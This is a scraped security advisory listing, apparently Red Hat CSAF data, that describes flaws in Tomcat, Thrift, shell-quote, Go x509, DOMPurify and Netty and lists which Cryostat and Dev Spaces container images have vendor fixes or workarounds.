"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "tomcat-coyote: Apache Tomcat: Authentication bypass via digest authentication"
}
]
}
RHSA-2026:28010
Vulnerability from csaf_redhat - Published: 2026-06-22 17:15 - Updated: 2026-07-03 12:03A flaw was found in Apache Thrift c_glib language bindings. A remote attacker could send specially crafted requests to a c_glib-based Thrift server, leading to a mismatched memory management routines vulnerability. This could cause the server to crash with a "free(): invalid pointer" error, resulting in a Denial of Service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64 | — |
A flaw was found in the shell-quote component. The quote() function did not properly validate object-token inputs, allowing line terminators to pass unescaped into the output. A remote attacker could exploit this vulnerability by providing specially crafted input, which a POSIX shell would interpret as a command separator. This could lead to command injection, enabling the attacker to execute arbitrary code on the system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64 | — |
A flaw was found in Go's `crypto/x509` package. A remote attacker could exploit this by presenting a specially crafted certificate chain containing a large number of policy mappings. This inefficient validation process consumes excessive resources, which can lead to a denial of service (DoS) for applications or systems performing certificate validation.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64 | — |
Workaround
|
A flaw was found in DOMPurify, a DOM-only cross-site scripting sanitizer. A remote attacker could exploit an inconsistency in how forbidden tags and attributes are handled when function-based tag additions are used. This allows malicious HTML, MathML, or SVG elements to bypass sanitization and execute arbitrary code in the user's browser, leading to Cross-Site Scripting (XSS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64 | — |
Workaround
|
A flaw was found in Netty. The HttpProxyHandler component, which handles HTTP CONNECT requests, does not properly validate user-provided outbound headers. This allows an attacker to inject arbitrary HTTP headers into the CONNECT request sent to the proxy server. This could lead to unexpected behavior or potential bypass of security controls on the proxy server.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64 | — |
A flaw was found in Netty. Netty's DNS (Domain Name System) codec does not properly enforce domain name constraints as defined in RFC 1035 during both encoding and decoding processes. This vulnerability allows a remote attacker to exploit the decoder using malicious DNS responses or exploit the encoder through user-influenced hostnames, leading to a high integrity impact on the affected system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64 | — |
Vendor Fix
fix
Workaround
|
|
